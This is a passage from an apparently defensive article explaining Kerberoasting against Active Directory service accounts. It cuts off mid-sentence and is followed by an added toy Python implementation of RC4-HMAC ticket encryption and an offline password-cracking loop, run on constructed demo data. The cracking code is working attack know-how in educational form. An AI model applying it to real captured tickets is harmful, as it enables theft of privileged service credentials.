Making Kerberoasting uneconomical
Sophisticated Heist
Unauthorized access to credentials is part of virtually every successful cyberattack. Attackers are particularly interested in techniques that yield credentials with far-reaching authorizations without immediately setting off the alarm bells on monitoring systems. Some of these techniques arise not from a bug but from the intended functionality of Windows and Active Directory (AD).
Stolen and Broken
Kerberoasting [1] is an attack technique that relies on the fact that, in Kerberos, any user or computer account can request a service ticket for any service from the domain controller (DC). Whether the requesting account is actually authorized to use the service is only checked when the service is accessed with this ticket, not when the ticket is issued. Therefore, if a security principal in the AD has a service principal name (SPN), any user – including a standard user or a workstation hijacked by an attacker – can obtain a service ticket for this security principal from a DC.
The service ticket issued by the DC contains a part that is intended exclusively for the requested service principal and is also meant to prove that the ticket was generated by the DC of the specified domain. For this purpose, this part is encrypted with the long-term Kerberos key of the service account, which is derived from the account's password and is ideally known only to the DC and the account itself (for the RC4-HMAC encryption type, this key is simply the account's NT hash). However, the encrypted part contains information that is known from the outset, such as the name of the requesting user, which allows the success of a decryption attempt to be verified quickly and reliably. The information attackers are after is therefore not contained in the payload; it is the encryption key itself.
Kerberoasting therefore boils down to brute force: guessing the service account's password offline until a candidate key decrypts the ticket. As a rule, attackers first extract the complete service ticket from the compromised environment and then use tools such as Hashcat or John the Ripper in their own environment to reconstruct
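The mechanism described in the last two paragraphs, as an added example that is not part of the original article and not code from Hashcat or John the Ripper: a toy Python re-implementation of the RC4-HMAC encryption profile (encryption type 23, RFC 4757), the type against which Kerberoasting is cheapest. A constructed stand-in for a ticket's encrypted part is encrypted under a hypothetical weak service account password and then recovered with the same guess, derive key, decrypt, verify loop the cracking tools run, only much more slowly. The service password, client name, wordlist and confounder are all assumptions, and the EncTicketPart stand-in is not real ASN.1.

```python
"""Toy RC4-HMAC (etype 23) ticket encryption per RFC 4757 and the offline
Kerberoasting loop against it. Added example; not the article's or hashcat's code."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
KU_TICKET = 2  # RFC 4120 key usage number for a ticket's encrypted part


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320), written out because OpenSSL 3 builds of hashlib often
    refuse hashlib.new('md4')."""
    def rol(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, word order, shift amounts)
        (lambda x, y, z: (x & y) | (~x & z), 0, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a = rol((a + f(b, c, d) + words[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(u + v) & MASK for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """For RC4-HMAC the service account's long-term key is its NT hash."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes, usage: int) -> bytes:
    # RFC 4757: K1 = HMAC-MD5(K, key usage as a 4-byte little-endian integer)
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """edata = checksum || RC4(K3, confounder || plaintext), as the KDC builds it."""
    k1 = _k1(key, usage)
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Returns the plaintext, or None when the checksum rejects the key."""
    k1 = _k1(key, usage)
    checksum, body = edata[:16], edata[16:]
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, body)
    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        return None
    return data[8:]  # drop the 8-byte confounder


def kerberoast(edata: bytes, known_cname: bytes, wordlist):
    """Offline loop: derive a key from each candidate password, attempt the
    decryption, and accept a hit only when the integrity check passes and the
    predictable plaintext (the requester's own name) is present."""
    for candidate in wordlist:
        plain = rc4_hmac_decrypt(nt_hash(candidate), KU_TICKET, edata)
        if plain is not None and known_cname in plain:
            return candidate
    return None


# --- Constructed demo data, not a captured ticket ---------------------------
SERVICE_PASSWORD = "Summer2024!"        # hypothetical weak password on an SPN account
CLIENT_NAME = b"lowpriv@CORP.EXAMPLE"    # the requester, which the attacker knows
# A real EncTicketPart is DER-encoded ASN.1; this stand-in keeps only the property
# that matters here: the encrypted part carries plaintext the requester already knows.
ENC_TICKET_PART = b"EncTicketPart{cname=" + CLIENT_NAME + b",session_key=...}"
CONFOUNDER = bytes(range(8))             # fixed for reproducibility; a KDC uses random bytes
TICKET = rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), KU_TICKET, ENC_TICKET_PART, CONFOUNDER)
WORDLIST = ["password", "Welcome1", "Spring2024!", "Summer2024!", "Autumn2024!"]

if __name__ == "__main__":
    print("recovered service account password:", kerberoast(TICKET, CLIENT_NAME, WORDLIST))
```

Two points in the loop carry over directly to the real tools: every candidate costs one MD4 and three HMAC-MD5 computations plus an RC4 pass, which is why etype 23 tickets crack orders of magnitude faster than AES tickets whose keys go through PBKDF2; and the attacker never touches the DC again after the initial ticket request, so nothing in this loop generates a domain event to detect.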